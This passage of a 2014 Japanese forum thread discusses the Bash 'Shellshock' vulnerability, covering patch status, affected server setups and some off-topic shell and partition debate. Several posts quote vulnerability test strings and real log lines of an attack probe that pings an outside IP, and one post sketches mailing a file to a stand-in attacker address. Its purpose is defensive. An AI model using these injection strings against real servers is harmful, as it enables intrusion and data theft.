XPが終わってLinux誘導がウザい展開だったが、やっぱり地雷が来たw。んあか誘導が激しい後に地雷ってパターン化してるよな???

295 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:45:02.25 ID:HxYlFGjK0
>>251
system,openはヤバすぎるからそのまま使ってるやつなんてほとんどおらんな。

296 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:45:48.36 ID:xUXAbHWp0
>>294
誘導に乗った人なんているんかね?(押入に眠ってるTurboLinux3のパッケージを思い浮かべながら

297 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:47:52.66 ID:fLa14sJ20
余ったマシンにLinux入れようとしてたけど
様子見よう

298 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:50:03.96 ID:hmveqYx/0
>>294
XPから乗り換える人は個人利用だろう?
なら、ほぼ関係ない。

299 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:51:11.76 ID:2db0ttXF0
: ←コイツ何?

300 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:54:04.95 ID:1Adck5yR0
コロンちゃん

301 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:54:24.30 ID:fWFvdPD70
「Bash」のバグを利用する攻撃、早くも見つかる
http://japan.cnet.com/news/service/35054302/

302 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:54:50.33 ID:LybMWC6v0
:D

303 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:57:27.40 ID:r5uKaSL2i
;D

304 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:59:02.27 ID:1Adck5yR0
:-(

305 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 12:59:16.59 ID:LybMWC6v0
XD

306 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:10:29.26 ID:l7M/4FEo0
RHELとCentOSも来たな

307 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:22:36.99 ID:2db0ttXF0
#!/usr/bin/env bash
:;exec emacs -batch -l "$0" -f main "$@"
(defun main () (message "watashidesu ^o^;"))

308 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:34:32.35 ID:ssTzLsUE0
>同氏はまた、アドバイザリで報告されているように、DHCPサービスにも脆弱性があると警告している。
>「この簡単なスキャンでは3000件しか発見できなかったが、これは明らかにワーム攻撃の対象となるもので、
>簡単にファイアウォールの裏側に達し、多くのシステムに感染する可能性がある。
>重要な問題は、Mac OS Xと『iPhone』のDHCPサービスにこの脆弱性があるかどうかだ。
>ワームがファイアウォールの裏側に入り、悪意のあるDHCPサーバーが実行されれば、大規模ネットワークが
>『ゲームオーバー』」になってしまう」(Graham氏)
ttp://japan.cnet.com/news/service/35054302/

309 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:35:26.65 ID:zh80M7360
でもこれで一律してsystem()を使うのは悪みたいな流れもどうかと思う
早く安く作れるのはそれはそれで利点がある
使いどころを考えればいいだけの話

310 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:36:51.85 ID:3nFaZNK30
いや、システム関数は出来れば呼ばない方がいい
他に手段がなければ仕方ないけど

311 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:38:05.51 ID:3nFaZNK30
DHCPサーバにマルウェア仕掛ければ、クライアントのLinuxPCに任意のコマンドを実行出来る

312 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:42:29.92 ID:pUw0j+wr0
Linux脳


Linux脳とは、Linuxを大前提として、FreeBSDやMac OS XなどのBSD系OSをはじめ、
その他のUNIX系OSを考慮しない思考を行うLinux信者を、それらOSの信者が蔑む際に用いられる用語である。

主な症状

Linux脳の典型としてbash依存のシェルスクリプトを非常に好む点がよく挙げられる。
私的利用であれば特に問題になる話ではないが、公にオープンソースで公開しているソフトウェアの
configureの中身にまでbash依存の記述を多用していると、FreeBSDが強い勢力を持つ某巨大掲示板などにおいて「Linux脳か」と言われる。

このLinux脳の代表的な例としてはMonoが良く挙げられている。
なお、最近になってsystemdというDebian/FreeBSDをおもちゃ呼ばわりする新興勢力が現れた模様。

なお、このような発言をする人物の99%は*BSDとcshで育ったキモヲタとみて間違いない。

313 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:47:04.55 ID:Byh6xQb80
system()はヤバいから、使うなら起動するコマンドはフルパスで書けって流儀があったのだが、
今回はそれでもヤバいってわけで。
まあもともとは/bin/shがbashなんてふざけたシステム存在しなかったし。

314 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:54:54.69 ID:A9s1poov0
セフセフ

#bash脆弱性検証結果
mod_phpでphpを動かす→セーフ
mod_phpでsystem()関数を使う→セーフ
phpをCGIで動かすがsystem()関数を使わない→セーフ
phpをCGIで動かしてsystem()関数を使う→アウト!!
2014年9月25日 11:17

315 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 13:56:56.23 ID:cDgXKoPG0
CentOSに修正第二弾入れた

> $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
> this is a test

> $ env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("
> echo vuln
> cat: echo: No such file or directory

よさげ

316 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 14:43:51.14 ID:omtPk7C+0
Ubuntu使ってるけど意味わからんw
bashと端末って違うのか

317 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 14:49:31.05 ID:r5uKaSL2i
>>316
((shell)UI)←端末アプリ

318 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 14:52:58.98 ID:rG+i7nRV0
空きPCにUbuntu入れたばかりの俺は
何を対策すればいいの?

319 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 14:56:48.32 ID:hmveqYx/0
普通にアップデートしとけばいいよ

320 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 16:01:08.58 ID:hYe4cDWV0
>>312
bash依存はいけないいけないと思いつつやってしまうよな
最近はもう開き直って#!/bin/bashですよ

321 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 16:03:27.40 ID:r5uKaSL2i
よく読んだらzsh使いってけっこういるんだな
俺は使いこなせそうにないからtcshのままだわ
馴染むって怖いことだわ

322 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 16:34:51.27 ID:dIm2BnxO0
zsh自体結構やりこめるけど、
それを補佐するプラグインもおいしい

zawとか
http://qiita.com/termoshtt/items/68a5372a43543037667f
http://qiita.com/scalper/items/4728afaac9962bf91bfa

323 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 16:57:19.63 ID:hRpcAZYy0
ていうか、これまでどんな攻撃されてたんだとか思うと、ぞっとするわw

324 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 17:03:09.21 ID:9u4biSZ90
それこそログ見りゃ分かるだろ
httpdのログ捨ててるのか?

325 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 18:01:32.77 ID:rG+i7nRV0
俺のubuntu、すでに須藤って男に乗っ取られてるぽい

326 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 18:07:02.83 ID:l7M/4FEo0
2回目のパッチ当て開始

327 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 18:33:38.81 ID:SCsm3ua50
centosパッチ第二弾当てておいた
しかしbashでCGIってなぜか言われるまで思いつかなかったわ

328 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 20:37:50.53 ID:l7M/4FEo0
apacheについては、mod_prelとかmod_phpを使わない場合、
無効にしておくべきだったと痛感するな

デフォルト設定のままの運用はやめてほしいなあ

329 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 21:39:49.48 ID:NIr4GHwS0
うちの Ubuntu12.04 と 10.04 も2回目のbashアップデートしたわー。

330 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 21:57:02.91 ID:A9s1poov0
今日のパッチもあてとかんとダメだぞ。
env X='() { (a)=>\' bash -c "echo ls -la /etc; cat echo"
↑これが動かないか確認。

331 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 21:58:27.68 ID:xbyokQ7g0
オンボロイド終わったなwwwww

332 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:05:33.15 ID:WEgnt6/m0
前のパッチ
とりあえず問題のコードが動かないようにしただけ
すぐに迂回された

今日のパッチ
一応根治

333 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:07:34.25 ID:C3v3wsQq0
もう3回くらいパッチ降ってきてるな
慌ててるのがわかる

334 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:33:37.77 ID:hmveqYx/0
bash使わないようにすりゃいいだけっていう

335 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:37:43.99 ID:imFdvtn30
/bin/shがbashなら使わないって無理だろ

336 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:38:10.68 ID:NIr4GHwS0
/bin/sh を bashにした RedHat が悪いんや・・・

337 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:43:20.35 ID:3YJ9qqsC0
2個あっても無駄だと思って1個にしたんだろうね
無駄をなくす努力が仇になった

338 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:47:06.02 ID:9ar7TTSP0
うちも着てた
ハッカーさん速いな

89.207.135.125 - - [    ] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 320 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

339 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 22:54:21.58 ID:zsSx6b7u0
一方、Debian はbashの代わりに軽量なdashを作った

340 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 23:01:11.98 ID:9ar7TTSP0
うちのブロードバンドルーターみたけどそもそもbashは入ってないみたいだ

341 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 23:09:36.20 ID:Byh6xQb80
/bin/shがbashだとメモリ効率悪いだろうしな。
/bin/shの機能範囲だったらbashは牛刀すぎる。

342 :270:2014/09/26(金) 23:13:03.61 ID:cznQEdLG0
>>270
で言ったやつ、これだったのか
http://headlines.yahoo.co.jp/hl?a=20140926-00000114-impress-sci

アマゾンの荷物、時間指定しようと思ってアクセスしたら気づいたんだけど、
下手すると「おまえがやったんじゃねえの?」って疑われるなw

343 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 23:18:29.83 ID:9ar7TTSP0
実際この脆弱性使うと、流石にrm -Rf / を実行しても普通は一般ユーザーだから大したことはないけれど、
例えば個人情報が入ったファイルに対し cat ほにゃほにゃ | mail crackers@2ch.example.net ぐらいは実行できそうだよね

多分いまでも、例えば管理用パスワードが暗号化保管されてなくて、設定ファイルに平文で記載されているなんていうパターンも少なくはないだろうし
その場合も同様にして読み出せてしまいそうだ

344 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 23:25:02.31 ID:1GN+sHjj0
CプログラムのCGIは平気なの?

345 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/26(金) 23:51:52.85 ID:1Adck5yR0
全然。

346 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:13:06.58 ID:lrrdY+nP0
>>344
Cで書いてもsystem()使えばシェルを呼び出すからアウト

347 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:15:31.77 ID:lrrdY+nP0
>>341
俺もそう思ったことあるけど、仮想記憶とCoWで思ったほど無駄にはならない
/bin/shを変更出来るDebian系で実際にメモリ消費を比べてみればいい
それに/bin/shとログインシェルが別のほうがかえって無駄になる可能性も

348 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:17:39.67 ID:rtk/NzrD0
AIX でbash を使っているんだけど
対応が必要なのかな?

349 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:23:11.47 ID:ehtMM5gH0
>>348
kshあるのにどうしてわざわざbash使うのかな

対策は必要

350 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:28:46.53 ID:1KEtr7yx0
環境変数がいじられなければ大丈夫ってこと?

351 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:28:55.23 ID:lrrdY+nP0
ログインシェルとしてだけ使っている人は慌てなくても大丈夫だろ
でも不気味だからアップデートすべきだと思うけど

352 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:30:51.25 ID:rtk/NzrD0
>>349
ありがとう。
お客様がオペレーション時に必ず使っている。
自分はもちろんksh派ですが。

353 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:30:52.76 ID:ehtMM5gH0
>>351
今でもコピペ用にrm ーrf /とか貼られてるんだから
ログインシェルだからっつったって、ダメだろう

354 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:36:56.01 ID:AbGeZtIu0
システムのデフォルトがbashでないなら
提供サービスとアカウントのシェル次第で緊急度は変わるけどな
まあ、わかんなきゃ対策しとけって

355 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 01:59:33.81 ID:sgBHCfFp0
CentOS7てもう対策された?

356 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 02:21:08.52 ID:lrrdY+nP0
もう主要なディストリはアップデートが出揃った
修正しきれてなかったぶんの再修正も来たぞ

357 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 02:33:13.11 ID:MmGz/zQ40
きた!盾きた!メイン盾きた!これで勝つる!

358 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 04:21:02.80 ID:3nHJVs0U0
ディストリGNOMEで/bin/shのリンク先はdash、ログインシェルはbashだったから
dashに変更ってやったけどこれで助かった・・・の・・かな?どうなんだろう・・・?

359 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 04:26:16.13 ID:wv8P0D890
Linuxって大雑把だよな
パーティションが/だけとか

360 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 05:16:49.42 ID:DZOu3Yo10
opensuseも2回めのアップデートきてたわ

361 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 05:17:43.93 ID:1E8s3oMw0
いや、普通は考えてパーティション切るよ^^;

362 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 05:34:08.09 ID:1E8s3oMw0
ネットワーク機器でRHELベースのアプライアンスって結構多いから、
HeartbleedやStrutsみたいにこれも尾を引くだろうなあ
検疫やNGファイアウォールやIPSでアクセス制限対象にweb警告画面を出すものとかね
アプライアンスなんてのは思ってるよりも中身はずっと雑な作りだし

363 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 05:50:07.79 ID:/aH0qgAY0
このアップデートのおかげでうちのシステムは動かなくなったわい
bash が関数をエクスポートする方法を互換性なく変えちゃったから
もうてんやわんや

364 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 05:57:15.48 ID:2o5Tc/ZZ0
えーと、現状は

・LAMPスタックはアウト (Debian系はこの攻撃にはセーフ)
・組み込みシステムではほとんどbusiboxが使われているのでまずセーフ
・最初に出たパッチはダメ
・2つ目のパッチで相当治った ただ完璧かどうかは分からん

というところか

365 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:01:30.85 ID:1E8s3oMw0
VMwareで言うとESXiはbusyboxでshがashだからセーフ
レプリケーション等の仮想アプライアンスはアウトの可能性高い?
機能の個別アプライアンス化を進めたのが今回は裏目かもね

366 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:05:00.31 ID:4aZDCsPE0
>>359
パーテションったら/dev/sda1とかのことじゃないか

367 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:08:44.53 ID:1E8s3oMw0
>>364
最初のパッチだけでもリモートから脆弱なcgiを狙った単純な攻撃はかなり止まる
CVE-2014-7169のほうはそれより結構状況が限定される
シェルが利用できないcgiアップロード可なレンタルサーバのシェル乗っ取りとか?
今時そんなしょぼいサービスがあるかは知らんが

368 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:12:46.02 ID:/aH0qgAY0
>>364
二つめのパッチを当てると、起動時に普通の名前の環境変数を eval しなくなる (今まではしてた)

名前の末尾に () がつく環境変数は未だに eval するけど
外からそんな環境変数を与える方法は(たぶん)ないから(たぶん)安全

369 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:21:18.73 ID:aeZAQVuC0
RedHatとか普通にインストールしたらbashは標準シェルになるだろ

370 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:29:00.14 ID:DZOu3Yo10
/bin/shがbashになってるディストリ多いからな

371 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 06:40:51.66 ID:4zBC187E0
>>203
なんて親切なハッカーだ

372 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 07:14:16.66 ID:ehucmcwY0
大昔からあったんやろなぁ

373 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 07:15:41.26 ID:IrYQ1Z5P0
                             FreeBSD

374 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 07:38:49.93 ID:wv8P0D890
>>366
それはドライブ

375 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:18:42.52 ID:UYd9SkP70
第2弾パッチ当ておわった

376 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:31:16.04 ID:UYd9SkP70
>>362
XenServerはアウトっぽいけど大丈夫かね
シトリックスのKBに乗ってないけど
blogには、色々書いてな

377 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:33:30.45 ID:6NahEr7W0
パッチどこに転がってる?

378 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:41:41.93 ID:06vVdJVY0
この穴に気づいてたハッカー結構いるんじゃないかな
やだぁこわい

379 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:44:09.78 ID:6NahEr7W0
>>338
おっと奇遇ですね.こっちも発見
89.207.135.125 - - [25/Sep/2014:15:37:05 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

380 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 09:47:57.58 ID:2o5Tc/ZZ0
infoconがyellowになってるな
ターゲットのプローブは相当広範囲に行われている

381 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 10:49:44.58 ID:EzLk7Tc40
>>364
あとRuby on Railsを動かすためのPassengerはかなり危険
/bin/shが/bin/bashの環境(CentOSやRHEL、Fedoraの系列)だとPassengerは死亡とのこと

なぜならアクセスするだけでワーカープロセスの起動のためシェルが使用されるとのこと
しかもPassengerは、設定をしないデフォルトだとothers(nobodyやapache、www-data)の権限ではなく、オーナー権限で動く可能性が高い

そして、そのオーナーがsudoをパスワードなしで使用できるような設定にsudoersが設定されている場合は、
sudoにttyを必須とする設定がされている場合を除いて、システムは丸裸となり、
rm -Rf / を防ぐものがなくなる

うちは速やかにbashのアップデートをしたというのもあるが、
Passengerをapacheユーザーで動かすようにしていたのと、sudoはtty必須にしていたので問題なかった

382 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 10:50:25.48 ID:EzLk7Tc40
>>371
でもたいていyumはrootじゃなきゃ実行できない
>>203でyum update bashがrootで実行されるようならおわっとる

383 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 11:23:17.14 ID:dH5pDxB20
USERAGENTに削除系コマンド仕込んで手当たり次第アクセスしてたらそのうち死ぬところ出てきそう。

384 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 12:30:54.64 ID:JMsYaJ6i0
NHKニュース入りしてた、こりゃ週明けの問い合わせも増えるな

閲覧でウイルス感染も「bash」に重大欠陥
http://www3.nhk.or.jp/news/html/20140927/k10014922101000.html

385 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 12:35:22.99 ID:6Js/lC4J0
シェルスクリプトに関数は不要
手続きコピペで回していこうよ

386 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 13:11:07.63 ID:iZcSAgwY0
TVでlinuxとかbashってワードがでてきてワロタ

387 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 13:23:33.70 ID:7mejjTHh0
なんだこれを理解できる奴がスレには沢山いるのに
現実のウェブ屋は履いて捨てるほどゴミばっかなのはなぜだぜ

388 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 13:29:48.30 ID:q3N+RhhU0
>>284
オプションで回避できるらしいぜ

389 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 13:39:45.06 ID:7mejjTHh0
御岳山
御嶽山

区別がつかない

390 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 14:11:37.00 ID:BFK1N6Pi0
>>384
素人向けはガバガバだな
BSニュースでホームページ表示のプログラムに欠陥とか言ってたからapacheかブラウザかと思ったわ

391 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 14:12:41.07 ID:LwfRrElw0
たかがシェルされど奥深いな

392 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 14:17:39.23 ID:6Js/lC4J0
カーネルのAPIたたくための道具だから何でも来いだわ

393 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 14:41:27.52 ID:5dr5BnN/0
Yahooでもこんな記載

http://headlines.yahoo.co.jp/hl?a=20140927-00000049-jij-int
> サーバー用ソフトに重大な欠陥=企業など対応急ぐ

394 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 14:52:16.16 ID:1E8s3oMw0
CVE-2014-6271のプローブは25日の午後がピークだったな
26日には主要ベンダのIPSやWAFのシグネチャも出てきてた

395 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 16:07:40.16 ID:3Mu5M5Ks0
これみよがしにbashがdisられてる気がする

396 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 16:08:43.76 ID:NBUHdZBF0
>>387
殆ど個人技能だから
大きな所から機器納入してサポート料払ってたって
今回の脆弱性程大きくてもメール1つ送ってこない
ハードのサポートは見るけどOS周りはベンダーが
対応するんだから知らないって所がほとんど
まして中身作るだけのweb屋じゃOSなんか知らないし

397 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 16:14:55.91 ID:3dli9mVO0
>>395
これはdisられてもしょうがないレベルの大欠陥だと思うぞ

398 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 16:17:35.65 ID:4MXfSIOK0
>>395
バッシュだけにバッシングか

399 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 17:02:25.97 ID:NBDeh0Y30
2chや@pagesに仕掛けられたバックドアってこれ経由でやられた感じ?

400 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 17:06:42.12 ID:3dli9mVO0
>>399
誰も気付いてなかったっぽい
わりとログに残りやすい攻撃なのに、脆弱性の公表以前には検出されてなかった

401 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 17:16:30.02 ID:R4EM3lAQ0
The situation is under control

402 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 17:19:23.45 ID:hjuhPXzM0
httpdが動いてるユーザの権限では大したことはできないだろうけど
不正なプログラムをダウンロード&実行させるとかで他の脆弱性と合わせ技でやられると怖い

403 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 17:29:59.58 ID:3dli9mVO0
>>402
日常的に見つかる権限上昇の脆弱性と組み合わせればroot取れるから油断は出来ない
それにroot取れなくてもDDoS攻撃に使うbot設置するくらいは簡単だから

404 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:18:08.48 ID:hjuhPXzM0
いやだから他の脆弱性と合わせ技でやられると怖いって書いたんだけど

405 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:31:17.90 ID:3dli9mVO0
ウンコ我慢してたから1行目しか読んでなかった

406 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:34:50.89 ID:Nwy3YrfwO
ケンモメンはソフトウェア開発者ばかりかと思ってたがネットワークやOSやサーバの技術者モメンも結構いるのな

407 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:49:47.87 ID:LcUsuThC0
今日日そこらの土方でも開発鯖の一つや二つくらい弄るだろ

408 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:51:50.40 ID:7mejjTHh0
LAMP的な開発環境あっても、今回の影響はPHPしか公開してないサーバなら大丈夫かどうか、が分かるのはそんなにいないと思う

409 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 18:53:09.32 ID:7mejjTHh0
職場でそーゆーこと言われたからね。
ポート開けてんのPHPじゃなくてApacheなのに。

410 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 19:06:14.91 ID:0CSOYu630
mod_phpはセーフ
cgiのphpはアウアウ
でもそんな単純な問題じゃないんだよな

411 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 19:33:45.06 ID:wv8P0D890
fastcgiだとかpassengerだとか、ウェブのアプリケーションサーバーでもシェルからキックして起動するタイプはたくさんある

412 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 20:02:25.32 ID:6Js/lC4J0
ノックしてピンッという

413 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 20:57:03.05 ID:BnA5Yeb00
このせいで明日は休日出勤だよ。。。

414 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 21:08:26.13 ID:zLRWh/Qs0
>>374
ディレクトリツリーとパーティションの区別がつかない奴に突っ込んでる奴に
パーティションとドライブの区別がつかない奴が突っ込んでてカッコ悪い。

415 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 21:11:45.80 ID:WByl+vFe0
>>399
とりあえず流出bbs.cgiにはこれに中るような穴はなかったと思う

416 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/27(土) 21:59:10.95 ID:HZr7I3RP0
OSXでシステム構築している所はアップルのパッチ待ちかな

417 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 00:08:28.32 ID:zb2Bztzx0
アップルトロ臭すぎるwww
やはりウブンツ最強やね

418 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:08:25.38 ID:kFATONB90
xpからlinuxに移ってきた奴は何がなんだか分からない状態だろうな

419 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:13:06.18 ID:adFSWnaE0
まあそういう層には関係ないから

しかも勝手にパッチを当ててくれるし
Windows Updateと同じ認識で十分だ

420 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:13:44.51 ID:4t+ZAViW0
>>414
Linuxだとスワップと/だけだけど、Linux以外のOSは標準インストールでパーティションを分けるのが普通

421 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:18:22.65 ID:adFSWnaE0
>>420
またそういうデタラメを言う

422 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:19:42.26 ID:4t+ZAViW0
Linuxしか使わないと、Linuxのやり方が常識に思えてしまう

423 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:24:27.36 ID:adFSWnaE0
パーティションを分けるか一つにするかの選択がOSの特性なわけがない

424 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:26:12.88 ID:4t+ZAViW0
/binや/sbinはリードオンリーでマウントして、/usr以下はライタブルでマウントして、セキュアにするとか
最近はめんどくさいからそこまでしない事も多いけど

425 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:29:49.59 ID:OHVYSB2N0
Linux っつーより「あるディストリの」デフォルトのパーティションがそれってだけだよね
カーネルはパーティションがどうとか知ったこっちゃないっしょ

426 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:35:15.35 ID:4t+ZAViW0
いつからこうなったのかは知らないけど、2000年の時点でRedhatはそうだった記憶がある
FreeBSDインストールするときは、毎回/varをディスクの内周にするか外周にするかで悩んでたから、驚いた
shがbashのシムリンクなのも、当時のSolarisのめんどくささからして、こんな事するんだって思ったな

427 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:36:04.58 ID:C7ILDX4v0
>>399
ttp://fox.2ch.net/test/read.cgi/poverty/1401704408/

428 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:43:44.24 ID:rWWhOPZl0
>>399
もうすこし用語を勉強してから言え

429 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 07:48:27.61 ID:+l9/L3570
>>426
昔はアホみたいにパーティション切って割り当てたが
今どきブート、スワップ以外でパーティション切りまくるなんて死に損ないのジジイだけだ
老害御用達のFreeBSDもインストーラー刷新で巨大パーティションがデフォになった
動的ファイルシステムとかも整備されてるから必要になった時に考えりゃいいしな

430 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 08:21:17.09 ID:8iiaj0sh0
個人利用ですら/homeは分けるだろ・・

431 :番組の途中ですがアフィサイトへの転載は禁止です:2014/09/28(日) 08:22:00.81 ID:4t+ZAViW0
今はLinuxさえ知ってればそれで十分と言うのはあるね

